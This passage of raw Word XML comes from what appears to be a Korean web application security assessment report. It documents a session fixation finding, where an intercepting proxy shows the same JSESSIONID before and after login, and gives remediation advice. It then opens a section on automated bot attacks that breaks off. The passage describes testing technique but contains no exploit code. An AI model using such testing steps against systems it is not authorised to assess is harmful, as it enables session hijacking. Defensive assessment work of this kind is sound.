                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>377190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1212850" cy="355600"/>
                <wp:effectExtent l="38100" t="38100" r="25400" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1002" name="직선 화살표 연결선 1002"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1212850" cy="355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A3F4C" id="직선 화살표 연결선 1002" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:129.8pt;margin-top:29.7pt;width:95.5pt;height:28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6XhJQIAAF8EAAAOAAAAZHJzL2Uyb0RvYy54bWysVM2O0zAQviPxDpbvNGlRV0vVdA9dCgcE&#10;FSzcXcdOLDm2NTZNewTxAkhIaCUO3LiuVjwV6r4DYycNv0ICkYPlsef7ZuabceZnu0aTrQCvrCno&#10;eJRTIgy3pTJVQZ9frO6cUuIDMyXT1oiC7oWnZ4vbt+atm4mJra0uBRAkMX7WuoLWIbhZlnlei4b5&#10;kXXC4KW00LCAJlRZCaxF9kZnkzw/yVoLpQPLhfd4et5d0kXil1Lw8ERKLwLRBcXcQlohrZu4Zos5&#10;m1XAXK14nwb7hywapgwGHajOWWDkJahfqBrFwXorw4jbJrNSKi5SDVjNOP+pmmc1cyLVguJ4N8jk&#10;/x8tf7xdA1El9i7PJ5QY1mCXDp9eHd58JDeX7w6vP9+8/UAO76++XF/Fs+SGqrXOzxC8NGvoLe/W&#10;ECXYSWiI1Mo9RFKadi/iLt5hwWSX1N8P6otdIBwPx5Px5HSKTeJ4d3c6PclTe7KOMaId+PBA2IbE&#10;TUF9AKaqOiytMdhoC10Mtn3kA+aEwCMggrUhLQa5l2OIaHurVblSWicDqs1SA9kynJPVKscvjgZS&#10;/OAWmNL3TUnC3qFKARQzlRa9pzYIiLJ0QqRd2GvRBX8qJMocy+yixwEXQ0jGuTBhPDChd4RJTG8A&#10;9mn/Cdj7R6hIw/834AGRIlsTBnCjjIXfpR12x5Rl539UoKs7SrCx5T6NSJIGpzip2r+4+Ey+txP8&#10;239h8RUAAP//AwBQSwMEFAAGAAgAAAAhAA1bsArfAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxM&#10;j8FOwzAMhu9IvENkJG4s7Wg2VppOqNLgAkgUxDlrTVuROFWTbd3bY05wtP3p9/cX29lZccQpDJ40&#10;pIsEBFLj24E6DR/vu5s7ECEaao31hBrOGGBbXl4UJm/9id7wWMdOcAiF3GjoYxxzKUPTozNh4Uck&#10;vn35yZnI49TJdjInDndWLpNkJZ0ZiD/0ZsSqx+a7PjgN6x09P3bnuaqzp5cqVetb+/pJWl9fzQ/3&#10;ICLO8Q+GX31Wh5Kd9v5AbRBWw1JtVoxqUJsMBAOZSnixZzJVGciykP8rlD8AAAD//wMAUEsBAi0A&#10;FAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54&#10;bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJl&#10;bHNQSwECLQAUAAYACAAAACEAx8el4SUCAABfBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAUAAYACAAAACEADVuwCt8AAAAKAQAADwAAAAAAAAAAAAAAAAB/BAAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAIsFAAAAAA==&#10;" strokecolor="red" strokeweight="1.5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251493376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1ADF5D05" wp14:editId="5B1C5F43">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1419225</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>283210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="207818" cy="221673"/>
                <wp:effectExtent l="0" t="0" r="20955" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="1001" name="직사각형 1001"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="207818" cy="2216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3EFA1" id="직사각형 1001" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:111.75pt;margin-top:22.3pt;width:16.35pt;height:17.4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qqsQIAAJcFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHdDf1fdVFGrIKSq&#10;VLSoZ8drZ1fyeoztZBNu5R2QeAMuHHguVN6BsfenUak4IHJw7J2Zb2Y+f+PTs02jyFpYV4MuaLaX&#10;UiI0h7LWy4J+uJ2/OqbEeaZLpkCLgm6Fo2fTly9OW5OLCVSgSmEJgmiXt6aglfcmTxLHK9EwtwdG&#10;aDRKsA3zeLTLpLSsRfRGJZM0PUxasKWxwIVz+PWiM9JpxJdScP9OSic8UQXF2nxcbVwXYU2mpyxf&#10;WmaqmvdlsH+oomG1xqQj1AXzjKxs/QdUU3MLDqTf49AkIGXNRewBu8nSJ93cVMyI2AuS48xIk/t/&#10;sPxqfW1JXeLdpWlGiWYN3tLDt/uHz99//rj/9fULiQbkqTUuR/cbc237k8NtaHojbRP+sR2yidxu&#10;R27FxhOOHyfp0XGGYuBomkyyw6PXgfvkMdhY598IaEjYFNTi1UVG2frS+c51cAm5NMxrpfA7y5Um&#10;LdZ/kh6kMcKBqstgDUZnl4tzZcmaoQLm8xR/feIdNyxDaawmtNg1FXd+q0SX4L2QSFJoo8sQ5ClG&#10;WMa50D7rTBUrRZftYDfZEBF7VhoBA7LEKkfsHmDw7EAG7I6B3j+EiqjuMbhv/W/BY0TMDNqPwU2t&#10;wT7XmcKu+syd/0BSR01gaQHlFiVkoZstZ/i8xhu8ZM5fM4vDhGOHD4R/h4tUgDcF/Y6SCuyn574H&#10;f9Q4WilpcTgL6j6umBWUqLca1X+S7e+HaY6H/YOjCR7srmWxa9Gr5hzw9lHeWF3cBn+vhq200Nzh&#10;OzILWdHENMfcBeXeDodz3z0a+BJxMZtFN5xgw/ylvjE8gAdWg0JvN3fMml7GHvV/BcMgs/yJmjvf&#10;EKlhtvIg6yj1R157vnH6o3D6lyo8L7vn6PX4nk5/AwAA//8DAFBLAwQUAAYACAAAACEA8vKWFN8A&#10;AAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVI7KiDaZISMqkACSEqFtCWvRtP&#10;k6h+RLGbhL/HrGA5ukf3ninXs9FspMF3ziLcLhJgZGunOtsg7HcvNytgPkirpHaWEL7Jw7q6vChl&#10;odxkP2nchobFEusLidCG0Bec+7olI/3C9WRjdnSDkSGeQ8PVIKdYbjQXSZJxIzsbF1rZ03NL9Wl7&#10;Nggf7nTk+kuITf70KvI3s5qa8R3x+mp+fAAWaA5/MPzqR3WootPBna3yTCMIcZdGFGG5zIBFQKSZ&#10;AHZAyO9T4FXJ/39Q/QAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBXTYqqsQIAAJcFAAAO&#10;AAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDy8pYU3wAAAAkB&#10;AAAPAAAAAAAAAAAAAAAAAAsFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFwYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251715584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="755500CF" wp14:editId="6A7F6DC5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2882265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>643255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="441960" cy="198120"/>
                <wp:effectExtent l="0" t="0" r="15240" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="991" name="직사각형 991"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4419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61C65" id="직사각형 991" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:226.95pt;margin-top:50.65pt;width:34.8pt;height:15.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q0sQIAAJUFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1uEzEQviPxDpbvdHejtDRRN1XUKgip&#10;aita1LPjtbMreT3GdrIJt/IOSH0DLhx4LlTegbH3p1GpOCD24LU9M994vvk5Od3WimyEdRXonGYH&#10;KSVCcygqvcrpx9vFm2NKnGe6YAq0yOlOOHo6e/3qpDFTMYISVCEsQRDtpo3Jaem9mSaJ46WomTsA&#10;IzQKJdiaeTzaVVJY1iB6rZJRmh4lDdjCWODCObw9b4V0FvGlFNxfSemEJyqn+DYfVxvXZViT2Qmb&#10;riwzZcW7Z7B/eEXNKo1OB6hz5hlZ2+oPqLriFhxIf8ChTkDKiosYA0aTpc+iuSmZETEWJMeZgSb3&#10;/2D55ebakqrI6WSSUaJZjUl6/Hb/+OX7zx/3vx6+knCPLDXGTVH5xlzb7uRwG0LeSluHPwZDtpHZ&#10;3cCs2HrC8XI8ziZHyD9HUTY5zkaR+eTJ2Fjn3wmoSdjk1GLiIp9sc+E8OkTVXiX40rColIrJU5o0&#10;ATQ9TKOFA1UVQRr0nF0tz5QlG4b5XyxS/EIwiLanhiel8TKE2AYVd36nRMBQ+oOQSBGGMWo9hOIU&#10;AyzjXGiftaKSFaL1drjvrLeIriNgQJb4ygG7A+g1W5Aeu31zpx9MRaztwbgL/W/Gg0X0DNoPxnWl&#10;wb4UmcKoOs+tfk9SS01gaQnFDgvIQttZzvBFhRm8YM5fM4uthEnH8eCvcJEKMFPQ7SgpwX5+6T7o&#10;Y4WjlJIGWzOn7tOaWUGJeq+x9ifZeBx6OR7Gh2+xmIjdlyz3JXpdnwFmH6sbXxe3Qd+rfist1Hc4&#10;RebBK4qY5ug7p9zb/nDm25GBc4iL+TyqYf8a5i/0jeEBPLAaKvR2e8es6crYY/1fQt/GbPqsmlvd&#10;YKlhvvYgq1jqT7x2fGPvx8Lp5lQYLvvnqPU0TWe/AQAA//8DAFBLAwQUAAYACAAAACEAC54R0N8A&#10;AAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMAyG70i8Q2QkbixdStkoTSdAQoiJAwy4Z43X&#10;Vmucqsna8vaYExzt/9Pvz8Vmdp0YcQitJw3LRQICqfK2pVrD58fT1RpEiIas6Tyhhm8MsCnPzwqT&#10;Wz/RO467WAsuoZAbDU2MfS5lqBp0Jix8j8TZwQ/ORB6HWtrBTFzuOqmS5EY60xJfaEyPjw1Wx93J&#10;aXjzx4PsvpTarh6e1erFrad6fNX68mK+vwMRcY5/MPzqszqU7LT3J7JBdBqus/SWUQ6SZQqCiUyl&#10;GYg9b1KVgSwL+f+H8gcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCquSq0sQIAAJUFAAAO&#10;AAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQALnhHQ3wAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAAAsFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFwYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EF6CE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F6F933" wp14:editId="35A31601">
            <wp:extent cx="4572000" cy="1815811"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="995" name="그림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1" b="30930"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1815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0EFA9" w14:textId="41971504" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="425" w:name="_Toc209094633"/>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60</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00167885" w:rsidRPr="00167885">
        <w:t>Burp Suite -&gt; Intercept on 후, 로그인 상태에서 새로고침</w:t>
      </w:r>
      <w:bookmarkEnd w:id="425"/>
    </w:p>
    <w:p w14:paraId="79C70985" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRPr="003651A3" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7"/>
    <w:p w14:paraId="63C53F6E" w14:textId="4189E7CE" w:rsidR="00EF6CE7" w:rsidRDefault="00EB0A9A" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251488256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="628EA0AD" wp14:editId="4C8FEC5E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2658110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1998345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2216150" cy="165100"/>
                <wp:effectExtent l="0" t="0" r="12700" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="1000" name="직사각형 1000"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="22161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E9E59" id="직사각형 1000" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:209.3pt;margin-top:157.35pt;width:174.5pt;height:13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iErgIAAJgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvNMmqW2jUbLVqtQip&#10;aita1LPXcTaRHI+xvZtdbuUdkHgDLhx4LlTegbGdpKtScUBcEo9n5hvPNz8np9tWko0wtgFV0Owg&#10;pUQoDmWjVgX9cLt49YYS65gqmQQlCroTlp7OXr446XQuJlCDLIUhCKJs3umC1s7pPEksr0XL7AFo&#10;oVBZgWmZQ9GsktKwDtFbmUzS9CjpwJTaABfW4u15VNJZwK8qwd1VVVnhiCwovs2Frwnfpf8msxOW&#10;rwzTdcP7Z7B/eEXLGoVBR6hz5hhZm+YPqLbhBixU7oBDm0BVNVyEHDCbLH2SzU3NtAi5IDlWjzTZ&#10;/wfLLzfXhjQl1i5NkSDFWqzSw7f7h8/ff/64//X1CwkK5KnTNkfzG31tesni0Se9rUzr/5gO2QZu&#10;dyO3YusIx8vJJDvKphiBoy47miKqJz959NbGurcCWuIPBTVYu0Ap21xYF00HEx9MwaKREu9ZLhXp&#10;EPQ4RXwvW5BN6bVBMKvlmTRkw7AFFgvMcgi8Z4bPkApf43OMWYWT20kRA7wXFbLk84gRfH+KEZZx&#10;LpTLoqpmpYjRpvvBBo+Qs1QI6JErfOWI3QMMlhFkwI4M9PbeVYT2Hp371P/mPHqEyKDc6Nw2Csxz&#10;mUnMqo8c7QeSIjWepSWUO+whA3G4rOaLBit4way7ZganCYuOG8Jd4aeSgJWC/kRJDebTc/feHpsc&#10;tZR0OJ0FtR/XzAhK5DuF7X+cHR76cQ7C4fT1BAWzr1nua9S6PQOsfoa7SPNw9PZODsfKQHuHi2Tu&#10;o6KKKY6xC8qdGYQzF7cGriIu5vNghiOsmbtQN5p7cM+q79Db7R0zum9jhwNwCcMks/xJN0db76lg&#10;vnZQNaHVH3nt+cbxD43Tryq/X/blYPW4UGe/AQAA//8DAFBLAwQUAAYACAAAACEAfQv/v98AAAAL&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU6EMBCG7ya+QzMm3twCEkqQslETYzQe1lXvXdoFsu2U&#10;0C7g2zue9Dj/fPnnm3q7OstmM4XBo4R0kwAz2Ho9YCfh8+PppgQWokKtrEcj4dsE2DaXF7WqtF/w&#10;3cz72DEqwVApCX2MY8V5aHvjVNj40SDtjn5yKtI4dVxPaqFyZ3mWJAV3akC60KvRPPamPe3PTsLO&#10;n47cfmXZq3h4zsSLK5dufpPy+mq9vwMWzRr/YPjVJ3VoyOngz6gDsxLytCwIlXCb5gIYEaIQlBwo&#10;yRMBvKn5/x+aHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAzORiErgIAAJgFAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQB9C/+/3wAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAAAgFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAFAYAAAAA&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D03445" wp14:editId="486BC158">
            <wp:extent cx="4572000" cy="2757196"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24130"/>
            <wp:docPr id="999" name="그림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0173" r="4702" b="8739"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="2757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F5294" w14:textId="538E3029" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="_Toc209094634"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:t>그림</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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61</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001202E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로그인 후에도 동일한 </w:t>
      </w:r>
      <w:r w:rsidR="001202E6">
        <w:t>JSESSIONID</w:t>
      </w:r>
      <w:r w:rsidR="001202E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 사용</w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
    </w:p>
    <w:p w14:paraId="62A1EC79" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F9DC5C" w14:textId="77777777" w:rsidR="00EF6CE7" w:rsidRPr="00CB22A6" w:rsidRDefault="00EF6CE7" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB22A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>해결방안</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4CBCA7" w14:textId="3F29EBE1" w:rsidR="00570AC5" w:rsidRDefault="00F642E0" w:rsidP="00EF6CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r w:rsidRPr="00F642E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인</w:t>
      </w:r>
      <w:r w:rsidRPr="00F642E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 시 세션 ID가 새로 갱신되도록 애플리케이션을 수정</w:t>
      </w:r>
      <w:r w:rsidR="005A1F04">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해야</w:t>
      </w:r>
      <w:r w:rsidRPr="00F642E0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 합니다. 또한, 안전한 세션 관리 정책을 적용하여 세션 고정 공격을 차단하고, 세션 쿠키에는 HttpOnly, Secure, SameSite 속성을 설정하여 세션 탈취 위험을 최소화할 필요가 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B77D90" w14:textId="07136762" w:rsidR="0096203F" w:rsidRDefault="0096203F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE47BC6" w14:textId="40220512" w:rsidR="0096203F" w:rsidRDefault="0096203F" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="427" w:name="_Toc209094566"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>자동화 공격</w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
    </w:p>
    <w:p w14:paraId="2A6D58BC" w14:textId="77777777" w:rsidR="0096203F" w:rsidRDefault="0096203F" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1FD3D" w14:textId="0AF37E1D" w:rsidR="0096203F" w:rsidRPr="00B5070A" w:rsidRDefault="00A61632" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자동화 도구,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트 그리고 봇이 로그인</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>회원가입,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>게시물 등록 등 특정 기능에 대해서 반복해서 호출하여 계정 탈취,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서비스 과부</w:t>
      </w:r>
      <w:r w:rsidR="00742979">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스팸 등록 등을 유발하는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이는 시도 횟수 제한,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>행위 기반 탐지 등</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>통제의 부재 혹은 우회</w:t>
      </w:r>
      <w:r w:rsidR="00DF58BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있는</w:t>
      </w:r>
      <w:r w:rsidR="001007A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>정책을 사용할 때 발견됩니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418CD7F0" w14:textId="77777777" w:rsidR="0096203F" w:rsidRDefault="0096203F" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5344F6AA" w14:textId="77777777" w:rsidR="0096203F" w:rsidRPr="00CB22A6" w:rsidRDefault="0096203F" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C636366" w14:textId="1DBD8999" w:rsidR="00F4259D" w:rsidRDefault="00506E77" w:rsidP="0096203F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
